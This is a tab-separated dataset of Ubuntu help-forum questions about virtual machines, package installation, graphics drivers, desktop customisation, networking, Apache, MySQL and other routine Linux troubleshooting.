432993	vmhosts and ssd drives	edit : ( sorry for the wall of text ) not so new linux user but i still consider myself mostly a novice , because this is me jumping off the diving board , anyways : ... from what little research i 've managed to dig up with google to set up a virtual machine host is i should use virtual box as it has more options and as it comes in ubuntu repositories , so i assume is both open source and free . would this assumption be correct ? the rest of the question revolves around the installations them selves so what i have is i want to set up a single machine to be my virtual machines ( up to 4 ) host and only to host said virtual machines ... firstly : i gather there is an ubuntu server installation mode that installs the stripped down server and from this i can just install virtualbox from repositories so as to save as many cycles/ much dive space as possible ? secondly : i can install each vm to also be as striped down as possible to only run on a vm host ? thirdly : can anyone recommend a partition set up for the master server so that the server boots from a ssd , but the vmboxes run soley from my raid partition for both redundancy and so once the master server is correctly set up , it should never again need to write to the ssd . i 'm lead to believe that regular writing to ssd drives drastically shortens their life . the idea being to set up the servers locally and when they are finished , i can just upload the image files to a online virtual hosting service . edit2 : ( and any modifications/updates can be worked on completely offline ) i do have some experience playing with vmware , but it was on a windows box . so , i 've tried the best i can to explain what i 'm trying to accomplish here , if i need to clarify anything further , please do n't hesitate to ask . many thanks in advance guys , really looking forward to working with everyone here . andrew
432994	update package-manager to include programs installed from source	i am installing aircrack-ng from source using the instuctions given in their official website . however when i am finished instaling , i run dpkg -- get-selections | grep aircrack-ng or apt-cache policy aircrack-ng both are showing that the package is not installed . however when i type aircrack-ng at the shell it shows a list of aircrack-ng options . so that i am sure that it is installed . but as it is not installed from the offcial repositories via apt-get it is not getting included in the package manager . my questions : how to include the application in apt-get or aptitude package manager that i install from source ? commands to view the list of all packages installed from source but has not been included in the package manager ? in windows i get a list of all installed programs in the control panel , irrespective of the way they are installed . what is the linux equivalent command ? dpkg -- get-selections returns a huge list that seem not only to contain all list of applications , but also drivers . i want just the applications names . what command do i issue ?
432996	can i assign multiple process to single keyboard shortcut ?	can i assign multiple process to single keyboard shortcut ? if yes , how to do it ? or tell me how can i copy something and run my own created object file when i press ctrl+c both at same time .
432999	ubuntu 13.10 amd64 live-usb not saving	so this week i have been messing around with my usb drive . i decided to make myself an ubuntu live-usb drive ( as i have done in the past ) . so i downloaded unetbootin and ubuntu 13.10 amd64 and set the persistence for 8 gigs . it was too big , so i changed it to 3 . it worked that time , so i rebooted . that 's where it first went wrong . so i then went to download yumi ( your universal multiboot installer , look it up on google ) . i set the persistence to 3 gigs . i rebooted . it worked perfectly ! ... . until the end . i reboot the ubuntu live-installation only to find all my stuff was gone . what is wrong ?
433000	half-life 2 sound problems	i downloaded half-life 2 on the linux steam and when i start it , everything works , but the sound . can you guys help me ?
433001	removing ubuntu completely on the same partition where my windows is also installed	i installed ubuntu on the same partition with my windows & now both are inside drive c. i 've already uninstalled it from the control panel but ubuntu still showing when booting . is there a way to remove the ubuntu without re-install my windows ?
433002	broadband connection connecting problem	i have installed ubuntu 12.04 on my asus x53e laptop using wubi ( ubuntu installer ) and having windows 7 ultimate already . i am having a broadband connection which works fine in windows 7 . and to use broadband coneection in ubuntu i followed the step shown on this link how to set up a broadband connection and it worked for me once first time i did as described in link . but when i restarted my laptop and tried again to connect to internet in ubuntu i was not able to do that . and also i could not see the network icon shown in this image . so what can be the problems ?
433003	how to install ubuntu-12.04.2-desktop-i386 ?	i want to install ubuntu . i have a windows 7 os & along with it i want to install ubuntu . that means two separate os in laptop .
433005	like ubuntu 13.10 , but do n't like the bloatware and like cinnamon desktop ? found an older post with few errors , i fixed them and thought i 'd repost	ubuntu 13.10 changed to just plain old cinnamon desktop all bloatware removed fast + easy ! read all before you do anything ! after installing a fresh ubuntu 13.10 , open the terminal with ctrl+alt+t start with first command ( copy , paste for all ) and move down the list step-by-step : sudo add-apt-repository ppa : gwendal-lebihan-dev/cinnamon-stable sudo add-apt-repository ppa : ubuntu-wine/ppa sudo add-apt-repository ppa : oibaf/graphics-drivers # ( this is for amd radeon 5xxx series ) sudo add-apt-repository ppa : webupd8team/java sudo sh -c 'echo `` deb http : //download.virtualbox.org/virtualbox/debian $ ( lsb_release -sc ) contrib '' > > /etc/apt/sources.list' wget -q http : //download.virtualbox.org/virtualbox/debian/oracle_vbox.asc -o- | sudo apt-key add - sudo apt-get install wine1.7 winetricks cinnamon oracle-java7-installer virtualbox-4.3 steam bleachbit synaptic playonlinux samba qbittorrent sudo apt-get update sudo apt-get upgrade sudo apt-get dist-upgrade sudo apt-get autoremove -- purge unity unity-common unity-services unity-lens-\* unity-scope-\* unity-webapps-\* gnome-control-center-unity libunity-core-6\* libunity-misc4 libunity-webapps\* activity-log-manager-control-center thunderbird-globalmenu libufe-xidgetter0 xul-ext-unity gnome-control-center gnome-session compiz compiz-gnome compiz-plugins-default libcompizconfig0 nautilus nautilus-sendto nautilus-sendto-empathy nautilus-share unity-lens-applications unity-lens-files unity-lens-friends unity lens-music unity-lens-photos unity-lens-shopping unity-lens-video sudo rm /usr/lib/thunderbird-addons/extensions/messagingmenu @ mozilla.com.xpi zeitgeist-daemon -- quit sudo apt-get autoremove -- purge activity-log-manager-common python-zeitgeist rhythmbox-plugin-zeitgeist zeitgeist zeitgeist-core zeitgeist-datahub open synaptic package manager ( lost track of my steps around here , but looked up cinnamon and made sure i had all the amd64 packages needed ) then searched share got a few packages . next i did applets , extensions and themes , i organized my start menu and placed applets in chosen places . i had to find a package for multi-core applet gir1.2-gtop to make it work and configure weather to my set location from weathernetwork.com sudo reboot |_ \ login to cinnamon / these steps are from a guideline as well as some of my own for my own build , i used this website as my guide : i wanted to build a clean , fast gaming rig and these steps i had to do two separate times because this person 's steps made it so i was not able to use the taskbar or the whole system would freeze and i 'd have to turn off the power supply ( ouch ! ) . that 's how i found out that these steps had some bugs , so i figured it all out . on the second fresh install , everything seems to be running excellently ! ( why i did a fresh install ? i wanted to find a way to repeat the steps every time ) keep in mind this needs a touch more tweaks , but i do not remember all the steps in the right order to type it out correctly after this step , but minor sharing packages and desktop editing tools ( personal edit ) through synaptic package manager and software manager were mostly all i needed , and then i needed to add some more of the cinnamon parts through synaptic . feel free to add any comments or the rest of the final steps you find work for you ( make sure they are in order please : to help people in the future ) find the rest of the bugs you have found after all my steps . if you do not know what you are doing do not do this to your ubuntu pc ! the guide i read from says the same as i will repeat : `` i will not be held responsible if you break your computer . '' i 've half ass copied , refined , and fixed the bugs that i had found from the above site for an easier guideline to use for me . you can resort to site for more explanation on steps . mine are just sudo commands copied from my terminal . any other suggestions , other bugs , fixes for a better running operating system would be much appreciated . so far i 'm happy with this build , but will be tweaking and stress testing it for the next few weeks . thanks for the read , hope you like it and everything goes smoothly for you like it did me . : ) thamas leave comments below : : )
433006	apt-get update eror `` e : the package lists or status file could not be parsed or opened. ``	this is coming to my screen after sudo apt-get update command on terminal : reading package lists ... error ! e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/dl.google.com_linux_talkplugin_deb_dists_stable_main_binary-amd64_packages e : the package lists or status file could not be parsed or opened . i have ubuntu 12.04 lts on my lenovo thinkpad laptop . can somebody give me hint or has it been already solved ?
433009	going into substitute user	i ca n't seem to be able to type in a password so that i may acquire access to # apt-get . i 'm looking to update my system via terminal , but typing out my password does no good to get me into su , as the spaces stay blank , and what i know is the password wo n't go through . has anyone else had this issue ?
433014	unable to install mysql 5.6 in ubuntu 12.04	i download mysql-5.6.16-debian6.0-x86_64.deb from official site . install using dpkg -i mysql-5.6.16-debian6.0-x86_64.deb it does create file in /opt/mysql/server-5.6/ . root @ ubuntu : ~ # cd /var/lib/mysql/ bash : cd : /var/lib/mysql/ : no such file or directory root @ ubuntu : ~ $ service mysql start mysql : unrecognized service root @ ubuntu : ~ $ chown -r mysql /opt/mysql/server-5.6/ chown : invalid user : mysql root @ ubuntu : ~ $ chgrp -r mysql /opt/mysql/server-5.6/ chgrp : invalid group : mysql i do n't know how to deal with this ... root @ ubuntu : ~ # ls -l /opt/mysql/server-5.6/ total 152 drwxr-xr-x 2 root root 4096 mar 12 11:56 bin -rw-r -- r -- 1 root root 17987 jan 14 23:38 copying drwxr-xr-x 2 root root 4096 mar 12 11:56 docs drwxr-xr-x 3 root root 4096 mar 12 11:56 include -rw-r -- r -- 1 root root 88109 jan 14 23:38 install-binary drwxr-xr-x 3 root root 4096 mar 12 11:56 lib drwxr-xr-x 4 root root 4096 mar 11 16:32 man drwxr-xr-x 10 root root 4096 mar 12 11:56 mysql-test -rw-r -- r -- 1 root root 2496 jan 14 23:38 readme drwxr-xr-x 2 root root 4096 mar 12 11:56 scripts drwxr-xr-x 28 root root 4096 mar 12 11:56 share drwxr-xr-x 4 root root 4096 mar 12 11:56 sql-bench drwxr-xr-x 3 root root 4096 mar 12 11:56 support-files
433017	clickable notifications that allow to interact with programs which have spawned them ?	there are notifications in kde 's system tray . the problem is that notifications do n't provide access to the apps that spawn those notifications . the only available action is to dismiss the notification . for example , a notification pops up and tells me that an archive extraction has been finished . i would like to click that notification for the extracted files to be opened in a file manager . instead , i have to manually browse for those files . or a notification pops up and tells me that there are system updates available . i would like to click the notification to access the updates manager ( or even immediately initiate the update ) . instead , i have to look for the update manager 's icon and open it manually . is there a way to enhance the notification system to enable that ? or there 's some plasma widget capable of interacting with notifications ?
433018	bumblebee error in ubuntu 13.10	i installed bumblebee couple times in ubuntu 13.10,12.04 but now it 's not working for ubuntu 13.10 . i followed the instruction here ( including nvidia-319-updates ) . when i try to run optirun it shows errors . $ optirun -vv firefox [ 37.843018 ] [ debug ] reading file : /etc/bumblebee/bumblebee.conf [ 37.843234 ] [ info ] configured driver : nvidia [ 37.843318 ] [ debug ] optirun version 3.2.1 starting ... [ 37.843325 ] [ debug ] active configuration : [ 37.843328 ] [ debug ] bumblebeed config file : /etc/bumblebee/bumblebee.conf [ 37.843331 ] [ debug ] x display : :8 [ 37.843333 ] [ debug ] ld_library_path : /usr/lib/nvidia-319-updates : /usr/lib32/nvidia-319-updates [ 37.843336 ] [ debug ] socket path : /var/run/bumblebee.socket [ 37.843339 ] [ debug ] accel/display bridge : auto [ 37.843342 ] [ debug ] vgl compression : proxy [ 37.843344 ] [ debug ] vglrun extra options : [ 37.843347 ] [ debug ] primus ld path : /usr/lib/x86_64-linux-gnu/primus : /usr/lib/i386-linux-gnu/primus [ 37.863100 ] [ debug ] using auto-detected bridge primus [ 38.752137 ] [ info ] response : no - error : [ xorg ] ( ee ) failed to load /usr/lib/xorg/modules/libglamoregl.so : /usr/lib/xorg/modules/libglamoregl.so : undefined symbol : _glapi_tls_context [ 38.752152 ] [ error ] can not access secondary gpu - error : [ xorg ] ( ee ) failed to load /usr/lib/xorg/modules/libglamoregl.so : /usr/lib/xorg/modules/libglamoregl.so : undefined symbol : _glapi_tls_context [ 38.752158 ] [ debug ] socket closed . [ 38.752171 ] [ error ] aborting because fallback start is disabled . [ 38.752176 ] [ debug ] killing all remaining processes . i purge/install bumblebee , nvidia-319-updates etc couple of times but no luck . dmesg message after start bumblebee . [ 38.020998 ] nvidia : module license 'nvidia ' taints kernel . [ 38.021003 ] disabling lock debugging due to kernel taint [ 38.027124 ] [ drm ] initialized nvidia-drm 0.0.0 20130102 for 0000:04:00.0 on minor 1 [ 38.027131 ] nvrm : loading nvidia unix x86_64 kernel module 319.60 wed sep 25 14:28:26 pdt 2013 [ 38.752497 ] vgaarb : this pci device is not a vga device [ 38.778036 ] nvrm : failed to copy vbios to system memory . [ 38.780897 ] nvrm : rminitadapter failed ! ( 0x30:0xffffffff:711 ) [ 38.780907 ] nvrm : rm_init_adapter ( 0 ) failed [ 334.417657 ] bbswitch : version 0.7 [ 334.417663 ] bbswitch : found integrated vga device 0000:00:02.0 : \_sb_.pci0.gfx0 [ 334.417670 ] bbswitch : found discrete vga device 0000:04:00.0 : \_sb_.pci0.rp05.pxsx [ 334.417682 ] bbswitch : failed to evaluate \_sb_.pci0.rp05.pxsx._dsm { 0xf8,0xd8,0x86,0xa4,0xda,0x0b,0x1b,0x47,0xa7,0x2b,0x60,0x42,0xa6,0xb5,0xbe,0xe0 } 0x100 0x0 { 0x00,0x00,0x00,0x00 } : ae_not_found [ 334.417689 ] bbswitch : failed to evaluate \_sb_.pci0.rp05.pxsx._dsm { 0xa0,0xa0,0x95,0x9d,0x60,0x00,0x48,0x4d,0xb3,0x4d,0x7e,0x5f,0xea,0x12,0x9f,0xd4 } 0x102 0x0 { 0x00,0x00,0x00,0x00 } : ae_not_found [ 334.417700 ] bbswitch : failed to evaluate \_sb_.pci0.gfx0._dsm { 0xa0,0xa0,0x95,0x9d,0x60,0x00,0x48,0x4d,0xb3,0x4d,0x7e,0x5f,0xea,0x12,0x9f,0xd4 } 0x102 0x0 { 0x00,0x00,0x00,0x00 } : ae_not_found [ 334.417701 ] bbswitch : no suitable _dsm call found . bumblebee.conf # configuration file for bumblebee . values should **not** be put between quotes # # server options . any change made in this section will need a server restart # to take effect . [ bumblebeed ] # the secondary xorg server display number virtualdisplay=:8 # should the unused xorg server be kept running ? set this to true if waiting # for x to be ready is too long and do n't need power management at all . keepunusedxserver=false # the name of the bumbleblee server group name ( gid name ) servergroup=bumblebee # card power state at exit . set to false if the card shoud be on when bumblebee # server exits . turncardoffatexit=false # the default behavior of '-f ' option on optirun . if set to `` true '' , '-f ' will # be ignored . noecomodeoverride=false # the driver used by bumblebee server . if this value is not set ( or empty ) , # auto-detection is performed . the available drivers are nvidia and nouveau # ( see also the driver-specific sections below ) driver=nvidia # directory with a dummy config file to pass as a -configdir to secondary x xorgconfdir=/etc/bumblebee/xorg.conf.d # # client options . will take effect on the next optirun executed . [ optirun ] # acceleration/ rendering bridge , possible values are auto , virtualgl and # primus . bridge=auto # the method used for virtualgl to transport frames between x servers . # possible values are proxy , jpeg , rgb , xv and yuv . vgltransport=proxy # list of paths which are searched for the primus libgl.so.1 when using # the primus bridge primuslibrarypath=/usr/lib/x86_64-linux-gnu/primus : /usr/lib/i386-linux-gnu/primus # should the program run under optirun even if bumblebee server or nvidia card # is not available ? allowfallbacktoigc=false # driver-specific settings are grouped under [ driver-name ] . the sections are # parsed if the driver setting in [ bumblebeed ] is set to name ( or if auto- # detection resolves to name ) . # pmmethod : method to use for saving power by disabling the nvidia card , valid # values are : auto - automatically detect which pm method to use # bbswitch - new in bb 3 , recommended if available # switcheroo - vga_switcheroo method , use at your own risk # none - disable pm completely # https : //github.com/bumblebee-project/bumblebee/wiki/comparison-of-pm-methods # # section with nvidia driver specific options , only parsed if driver=nvidia [ driver-nvidia ] # module name to load , defaults to driver if empty or unset kerneldriver=nvidia-319-updates pmmethod=auto # colon-separated path to the nvidia libraries librarypath=/usr/lib/nvidia-319-updates : /usr/lib32/nvidia-319-updates # comma-separated path of the directory containing nvidia_drv.so and the # default xorg modules path xorgmodulepath=/usr/lib/nvidia-319-updates/xorg , /usr/lib/xorg/modules xorgconffile=/etc/bumblebee/xorg.conf.nvidia # # section with nouveau driver specific options , only parsed if driver=nouveau [ driver-nouveau ] kerneldriver=nouveau pmmethod=auto xorgconffile=/etc/bumblebee/xorg.conf.nouveau xorg.bumbleebee.nvidia section `` device '' identifier `` discretenvidia '' driver `` nvidia '' vendorname `` nvidia corporation '' busid `` pci:04:00:0 '' # changed to 04:00.0 but no luck . so revert back . lspci 04:00.0 3d controller : nvidia corporation gk208m [ geforce gt 740m ] ( rev a1 )
433021	how can i get install a cool computer language for ubuntu ?	i am considering taking an online class through coursera.org . the class is offered by stanford university . they use the cool programming language . does anyone have experience installing cool in ubuntu ?
433023	ubuntu 13.10 wifi problem in lenovo thinkpad l420	in lenovo thinkpad l420 wifi signal not coming properly . some time not connected also .
433024	list all manually installed packages similar to history.log file	i searched the whole internet for this but did not find any satisfactory answer for this question . aptitude search â~i ! ~mâ | less does not show the manually installed packages . on my system it shows a huge list : i accountsservice - query and manipulate user account informat i acl - access control list utilities i acpi-support - scripts for handling many acpi events i acpid - advanced configuration and power interface i add-apt-key - command line tool to add gpg keys to the a i adduser - add and remove users and groups i alsa-base - alsa driver configuration files i alsa-utils - utilities for configuring and using alsa i anacron - cron-like program that does n't go by time i apache2 - apache http server i apache2-bin - apache http server ( binary files and modul i apache2-data - apache http server ( common files ) i apache2-mpm-prefork - transitional prefork mpm package for apach i apg - automated password generator - standalone i apt - commandline package manager i apt-clone - script to create state bundles i apt-transport-https - https download transport for apt i apt-utils - package managment related utility programs i apt-xapian-index - maintenance and search tools for a xapian i aptdaemon - transaction based package management servi i aptdaemon-data - data files for clients i aptitude - terminal-based package manager i aptitude-common - architecture indepedent files for the apti i apturl - install packages using the apt protocol - i apturl-common - install packages using the apt protocol - i archdetect-deb - hardware architecture detector i ardour3 - digital audio workstation ( graphical gtk2 i aspell - gnu aspell spell-checker i aspell-en - english dictionary for gnu aspell i at-spi2-core - assistive technology service provider inte i avahi-autoipd - avahi ipv4ll network address configuration i avahi-daemon - avahi mdns/dns-sd daemon i avahi-utils - avahi browsing , publishing and discovery u i banshee - media management and playback application i baobab - gnome disk usage analyzer i base-files - debian base system miscellaneous files i base-passwd - debian base system master password and gro i bash - gnu bourne again shell i bash-completion - programmable completion for the bash shell i bc - gnu bc arbitrary precision calculator lang i bind9-host - version of 'host ' bundled with bind 9.x : and many others ... but obviously i didnot install all of these . on the other hand a much more effective solution is this : zcat /var/log/apt/history.log . *.gz | grep 'apt-get install' output : commandline : apt-get install wine1.7 winetricks commandline : apt-get install ubuntu-restricted-extras commandline : apt-get install pi commandline : apt-get install gparted commandline : apt-get install virtualbox commandline : apt-get install ardour3 commandline : apt-get install kubuntu-restricted-extras ubuntu-restricted-extras commandline : apt-get install apache2 commandline : apt-get install tasksel which are exactly the packages i installed manually . but the problem with the above solution is that the logs can be messed up . so what i want is the exact same output of the history.log file from some aptitude command . so that the log messing up wo n't pose any problem .
433027	ubuntu 12.04 & fglrx 13.1 drivers	my computer has an ati/amd radeon mobility 4650 . i have attempted to install the drivers as described in what is the correct way to install ati catalyst video drivers ( fglrx ) ? , however the amd website currently only allows the downloading of the newest drivers , which do not appear to work for 12.04 precise pangolin . i can not find a mirror with the older releases ( 12.8 is what i 'm looking for ) , and the information provided in the link above only goes up to 12.8 . i am having a lot of trouble with this , and my video card has lots of overheating issues . any help would be greatly appreciated . more info can of course be provided ( as long as you let me know what you need ! ) thanks
433028	how do i save a modified buffer for video resolution uncommented ?	i 've been getting a `` signal out of range '' message when trying to boot up . press down arrow , enter to get to recovery menu and go to system root prompt . from there i run sudo nano /etc/default/grub then uncomment the grub_gfxmode=1280x1024 line and try to save . it asks for a file name but the prompt is : /etc/default/grub . ca n't seem to do anything from there .
433029	finding my ip without using google	i am using vodafone 3g using usb modem . whenever i use ifconfig my ppp0 shows some ip like 10.29.24.32.xxx . but whenever i google using what is my ip , it shows some different ip like 84.64.15.yyy . my question is , is there any way to know my external or better say public ip without searching on google .
433030	how to know all files in ubuntu having stickybits ?	i now understand sticky bits and why i should use them based on my question : what is the `` sticky bit '' ( t permission ) and why does /tmp have it ? now i have a new question . how could i list all files that have stickybits in my ubuntu linux ?
433036	unixodbc driver manager error	while trying to connect with mssql am getting the the below error '' dbapierror : ( error ) ( '01000 ' , `` [ 01000 ] [ unixodbc ] [ driver manager ] ca n't open lib '/usr/lib/odbc/libtdsodbc.so ' : file not found ( 0 ) ( sqldriverconnect ) '' ) none none '' i ca n't able to connect with sql server . i already installed unixodbc . can anyone help me to solve the above issues ?
433037	why subdomain not working after rename in ubuntu	i had xyz.mydomain.com subdomain in ubuntu server.it was working fine . i just want to change that xyz to xyz1 , so i rename all folders as well as the virtual host settings in cd /etc/apache2/sites-available/ i used below commands ... cd /etc/apache2/sites-available/ sudo nano xyz1.mydomain.com < virtualhost *:80 > servername xyz1.mydomain.com serveralias www.xyz1.mydomain.com documentroot /var/www/xyz1/ < /virtualhost > < directory /var/www/xyz1/ > options -indexes followsymlinks multiviews allowoverride all order allow , deny allow from all < /directory > sudo a2ensite xyz1.mydomain.com sudo /etc/init.d/apache2 reload sudo a2enmod vhost_alias sudo /etc/init.d/apache2 reload now i am unable to view xyz1.mydomain.com website . is there any thing missing ?
433042	umbrello uml tool not opening	i 'm using version of ubuntu 13.10 and i install umbrello tool for uml diagrams . but the problem is when i click on the icon its not opening . when i open it using terminal like : $ umbrello its give me error : umbrello ( 5801 ) /kdeui ( kdelibs ) : attempt to use qaction `` edit_undo '' with kxmlguifactory ! umbrello ( 5801 ) /kdeui ( kdelibs ) : attempt to use qaction `` edit_redo '' with kxmlguifactory ! umbrello ( 5801 ) umllistview : :findview : could not find `` class diagram '' in umllistviewitem : `` logical view '' , type= '' lvt_logical_view '' , id= '' logical view '' , children=1 umbrello ( 5801 ) umllistview : :findview : could not find `` class diagram '' in umllistviewitem : `` logical view '' , type= '' lvt_logical_view '' , id= '' logical view '' , children=1 i do n't know how to launch it . any one know about it ?
433043	disc burning software of ubuntu	i want to compile and write xvid movie files to a disc for playing them on a standalone dvd player which requires iso 9660 file system . how can i choose this file system with the brasero disc burner ?
433050	exit from fish shell	i have fish shell setup as my default shell . i want to exit from fish shell to bash shell . how can i do that with opened fish shell ?
433053	ubuntu 13.10 lbp-1120 shared with windows 7	what i have ? cannon lbp-1120 and two workstations with ubuntu 13.10 and windows 7 . what i want to do ? i want to share my printer from linux to windows to be able using printing feature of windows programs without wine or so . note : i do n't want to use wine because i have deal with accounting and i require stable solution . what is the problem ? there is no apropriate lbp-1120 driver for windows 7 and i ca n't configure network printer . in other words , when i found shared printer windows asks me what driver it should use and this is my problem : i have driver at ubuntu but there is no one at windows . from my point of view there are two possible solutions : select compatible printer driver in windows prompt create virtual printer which will redirect printing request for existing printer .
433055	w : duplicate sources.list entry	w : duplicate sources.list entry http : //archive.canonical.com/ubuntu/ saucy/partner i386 packages ( /var/lib/apt/lists/archive.canonical.com_ubuntu_dists_saucy_partner_binary-i386_packages ) so any suggestions for how to fix it .
433056	error while loading shared libraries : libmwlaunchermain.so : can not open shared object file : no such file or directory	i am running mutsig command , its output : setting up environment variables ld_library_path is . : /usr/local/matlab/matlab_compiler_runtime/v80//runtime/glnxa64 : /usr/local/matlab/matlab_compiler_runtime/v80//bin/glnxa64 : /usr/local/matlab/matlab_compiler_runtime/v80//sys/os/glnxa64 : /usr/local/matlab/matlab_compiler_runtime/v80//sys/java/jre/glnxa64/jre/lib/amd64/native_threads : /usr/local/matlab/matlab_compiler_runtime/v80//sys/java/jre/glnxa64/jre/lib/amd64/server : /usr/local/matlab/matlab_compiler_runtime/v80//sys/java/jre/glnxa64/jre/lib/amd64/client : /usr/local/matlab/matlab_compiler_runtime/v80//sys/java/jre/glnxa64/jre/lib/amd64 /media/storage1/mutsigcv_1.3/mutsigcv : error while loading shared libraries : libmwlaunchermain.so : can not open shared object file : no such file or directory hence i did following things : $ cd / $ tree -af | grep `` libmwlaunchermain '' i am unable to find that package in above command and synaptic and in apt-get . also you can see there is ... /v80// ... its setting path , but in bashrc file i have mentioned all this path correctly . i do n't know why its considering wrong path ? i do n't know how to proceed . waiting for positive reply . thank you regards , chetan joshi . dokadya @ gmail.com
433062	using nmap for information regarding web host	am trying to get info of host run in linux about open/closed port the host is attacked randomly by hackers changing the content of the page.deleting files , homepage content changed . how can it be stopped ? i scan ports using nmap i found it normal to have ports open like 3306 for mysql 80 for apache and other like mail server pop3 the list of open ports are : 21/tcp ftp 22/tcp ssh 53/tcp domain 80/tcp http 110/tcp pop3 143/tcp imap 443/tcp https 587/tcp submission 993/tcp imaps 995/tcp pop3s 3306/tcp mysql when i use scan firewall protected for a network # nmap -sa 192.168.1.77 you requested a scan type which requires root privileges . quitting ! what tools to be used rather than nmap to take control over hacking ? any ideas or concept how to stop this nuisance referring to here for using nmap
433063	how to give a quicklauncher or shortcut administration privilege ?	i have a quicklauncher in a plasma widget ( which is the same as a shortcut ) which runs a command which needs administration privilege . i use the quicklauncher frequently and do not want to type root password each time . is there a way to give root privilege to the icon or somehow add the password to the command which is run by the icon ?
433064	ubuntu 12.04 lts server - build-essential install not possible	have found this question multiple times on the forum , but none of the answers were serious enough . so the problem with ubuntu 12.04 . lts server is that after a fresh install you can not install build-essential package . this is what you get : reading package lists ... building dependency tree ... reading state information ... some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : build-essential : depends : libc6-dev but it is not going to be installed or libc-dev depends : g++ ( > = 4:4.4.3 ) but it is not going to be installed things that do n't help : apt-get clean apt-get update apt-get -f install apt-get upgrade dpkg -- configure -a apt-get autoclean apt-get -- fix-missing install build-essential apt does say that i have `` held broken packages '' , but none of the above commands solves them . after running any of the above commands the summary at the bottom is all zeros ( upgraded , newly installed , remove , not upgraded ) uname -a gives : linux sorrg01lin 3.11.0-15-generic # 25~precise1-ubuntu smp thu jan 30 17:42:40 utc 2014 i686 i686 i386 gnu/linux lsb_release -a gives : distributor id : ubuntu description : ubuntu 12.04.4 lts release : 12.04 codename : precise
433068	why is my laptop brightness reset to minimum after every restart ?	i have an acer aspire 6930g with an nvidia 9600mgs and ubuntu 12.04 lts . every time i turn off my computer and then turn it back on the brightness is always set back at the lowest possible level . i like to use max brightness but the computer keeps reverting back to minimum brightness after i turn it off . i installed ubuntu on this computer a week ago and this has been happening since the first day . can anyone offer some solutions ? i 've tried a few and none of them worked for me , that 's why i 'm asking here
433069	dropbox 1.6.0 connexion menu greyed out with ubuntu 13.10	i installed dropbox over my new installation of ubuntu 13.10 ( unity desktop ) with the installation .deb file from dropbox ( 64-bit ) . ( i installed also its dependency python-gpgme . ) it worked before ( less than two weeks ) in my ubuntu 13.10 ( gnome desktop , not this one ) and then in an archlinux with gnome desktop ( less than one week ) but now the application is installed and i have the connexion menu greyed out as you can see : ( the menu is in french . ) you can see this video on youtube : http : //www.youtube.com/watch ? v=2em7cjal8v4 any clues ? ! p.s : sorry for the poor english .
433070	makedepend : command not found	i 'm trying to compile a source code and i 'm getting this error make [ 1 ] : makedepend : command not found do you have any suggestions ? i have ubuntu 12 04 lts , 2.6.28-17 kernel and gcc version 4.6.3
433071	backlight on laptop	my laptops backlight adjustment keys do n't work on 13.10 and the `` brightness and lock '' ui does n't work . i think it may have worked before installing nvidia drivers , but i do n't remember . i 've installed xbacklight and that works fine , but it 's kind of a pain to work with when i should have fn keys right here . ideas ?
433072	installation zabbix on ubuntu server 13.10	i installed zabbix 2.0 on ubuntu server 13.10 from repository and it work properly , but ... . php frontend does n't show any graphs . i checked gd - it 's works and shown in phpinfo . where should i check else ?
433074	how to create an empty virtual machine without os in kvm ?	can any one help me to create virtual machine in kvm hypervisor without os . just the vm should have 8gb disk , 512 mb ram and default nic interface .
433075	how to add 'new docx ' item in ubuntu file manager context menu ?	i 'm using ubuntu 13.10 with it 's default 'files ' file manager . it 's really annoying to have to save every newly created documents to manually specified location in libre writer every time . so , is there any way to add new entry to the file manager context menu so that i can create empty docx file by one click .
433076	keyboard key is n't working or not responding	tl/dr : when testing with xev the d key an rshift+x in xev is not responding so i ca n't really test it . is there a better program for that ? my little kid was playing with they keyboard and suddenly the 'd ' key stopped working . i temporarily remapped it to 'left super ' with xmodmap -e `` keycode 133 = d d d d dstroke dstroke dstroke '' currently when pressing the real 'd ' key nothing happens . same behavior i have with capital x key - when pressing it with the right shift . however , with the left shift everything 's ok .
433077	natural scrolling not remembered after reboot	i enabled natural scrolling through the system settings and this works fine for me . however , when i reboot , my computer somehow seems to have forgotten to reactivate this ... but when i go to the settings , the checkbox is still enabled ... if i uncheck it and recheck it , natural scrolling works fine again . how can i solve this ? thanks lorin
433081	permission denied while installing matlab in ubuntu 12.04	i 'm installing matlab in ubuntu 12.04 lts by using terminal commands . as mentioned in installation guide i am entering the following command : /path_to_dvd/install & but when i enter the command it shows permission denied . $ /home/pawan/documents/matlab/matlab_unix_2012a/ml2012au/install & [ 1 ] 19068 bash : /home/pawan/documents/matlab/matlab_unix_2012a/ml2012au/install : permission denied i have mounted my .iso file and given path of that as well but it did n't work and i gave path of my .iso also .
433084	enable port 9696 on ubuntu server	i am using ubuntu server lts 12.04 on vmware virtual machine . i need to enable port 9696 which is blocked or filtered . when i use the nc -v -w 1 localhost -z 9696 command it shows me the following message nc : connect to localhost port 9696 ( tcp ) failed : connection refused so i tried this command iptables -a input -p tcp -- dport 9696 -j accept but it is still not working . this is what iptables -l -n shows chain input ( policy accept ) target prot opt source destination nova-api-input all -- 0.0.0.0/0 0.0.0.0/0 chain forward ( policy accept ) target prot opt source destination nova-filter-top all -- 0.0.0.0/0 0.0.0.0/0 nova-api-forward all -- 0.0.0.0/0 0.0.0.0/0 chain output ( policy accept ) target prot opt source destination nova-filter-top all -- 0.0.0.0/0 0.0.0.0/0 nova-api-output all -- 0.0.0.0/0 0.0.0.0/0 chain nova-api-forward ( 1 references ) target prot opt source destination chain nova-api-input ( 1 references ) target prot opt source destination accept tcp -- 0.0.0.0/0 192.168.10.50 tcp dpt:8775 chain nova-api-output ( 1 references ) target prot opt source destination chain nova-api-local ( 1 references ) target prot opt source destination chain nova-filter-top ( 2 references ) target prot opt source destination nova-api-local all -- 0.0.0.0/0 0.0.0.0/0 any help would be appreciated .
433087	ubuntu 32bit 13.04 iso image for virtual box	hello folks from where i can download 32bit for 13.04 version for my virtual box . only 32bit . thanks shazz
433092	the command could not be located because '/sbin ' is not included in the path environment variable	i have a severe problem today : when i type ifconfig it does not show ip configuration on ubuntu 12.04 . can anyone help me on this ? here is the result of ifconfig : command 'ifconfig ' is available in '/sbin/ifconfig' the command could not be located because '/sbin ' is not included in the path environment variable . this is most likely caused by the lack of administrative privileges associated with your user account . ifconfig : command not found
433095	delete from remote server via nautilus ( ssh ) . and removed file can not be recovered ?	i accidentally removed file in remote server via nautilus ( connect to server ) . how can i recover the file ? thanks
